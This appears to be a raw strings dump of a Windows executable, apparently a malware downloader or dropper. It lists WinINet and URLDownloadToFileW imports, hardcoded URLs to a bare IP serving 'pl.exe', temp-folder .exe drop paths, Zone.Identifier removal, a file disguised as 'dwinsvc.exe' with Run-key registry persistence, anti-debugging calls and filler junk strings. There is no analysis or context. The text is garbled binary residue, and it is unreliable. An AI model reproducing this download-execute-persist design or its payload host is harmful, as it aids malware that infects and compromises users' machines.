!This program cannot be run in DOS mode.
Richce
`.rdata
@.data
@.reloc
tsh$@@
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
http://193.3.19.247/Installed
PreLoad
memset
wcslen
wcscmp
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
_crt_debugger_hook
?terminate@@YAXXZ
_unlock
__dllonexit
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
URLDownloadToFileW
urlmon.dll
InternetCloseHandle
InternetOpenUrlA
InternetOpenA
HttpQueryInfoA
InternetOpenUrlW
InternetOpenW
InternetReadFile
WININET.dll
PathFileExistsW
PathFindFileNameW
PathFileExistsA
SHLWAPI.dll
CreateProcessW
DeleteFileW
CloseHandle
WriteFile
CreateFileW
ExpandEnvironmentStringsW
GetTickCount
SetFileAttributesW
CopyFileW
GetModuleFileNameW
ExitProcess
GetLastError
CreateMutexA
DeleteFileA
MoveFileW
MoveFileA
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
QueryPerformanceCounter
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
KERNEL32.dll
wsprintfW
SetForegroundWindow
ShowWindow
FindWindowA
USER32.dll
RegCloseKey
RegSetValueExW
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
freeukraine
http://putinsucks.ua/
arhf8ahr8rhfh8rhf8
2dgd828d8g8fg8g8g
feu8gf8g2gf8g2fg
aefafugaugfgauegf
aefyaiegfayegfg
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0+050C0M0X0b0
13191X1
2?2L2\2b2
2!30383D3Q3a3l3
4@4M4]4
5:5L5y5
5+61666;6A6L6Q6W6\6a6g6l6q6w6
7 7%7*7/757@7E7K7V7[7a7n7{7
8$8/8>8K8P8U8[8
9 9%9+989E9Y9^9d9i9o9t9z9
:":B:O:c:h:n:y:~:
;0;5;;;@;E;K;V;a;w;};
<(<7<B<G<L<R<W<]<h<m<s<x<~<
=*=5=A=M=X=e=v=
>G>M>`>m>
?(?9???R?_?x?
0Z0v0|0
1#1-1G1Q1d1n1s1x1
1$2.242>2W2
2.343<3C3H3N3T3\3b3i3p3
4"4*464?4D4J4T4]4h4t4y4
5"5(5<5Q5\5t5
7A8d8q8}8
d1p1t1H6L6
@jjjjh
@jjjjh
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
%temp%
%s\2535235.jpg
dwinsvc.exe
Windows Service
http://193.3.19.247/pl.exe
%s:Zone.Identifier
%windir%
Software\Microsoft\Windows\CurrentVersion\Run\
%userprofile%
Software\Microsoft\Windows\CurrentVersion\Run\
gargarhrharharfafrahth
4yy4w4yw4fwgwgw
argarhargafafargh
ffag8f2g8fg82g8f8g8fg
rgarggh3f3dddaegg3
rsguufburfusbruf
aeufgaeugfagufgaegg
25262ggw4wgw4hw4h
ge8gfg82hf882fg88
eafauegfuaegfuagef
faeufag7efg7eg7f
efgaefuagfegfuafege
aeifehaiehfhiaehf
yw4ywfw3fwg4hw4h
aeygfygaeif7efg7eg7fe
eafae7g7ae8f8hehehf8h
efauefuaeugfuegufaef
rsgsihrgishgishrgr
aege7ff7e7ge7gf
a7aeg7fgae7f7eagf7eg
aefiheieiie
aefeufauefehf7ae7fh
aefiaegdegd7geg7dgeg7gf
afaufgueufueguagef
efihfieihfiehf
efaugfgauegfg
3g3tg3eafa3fa3ga33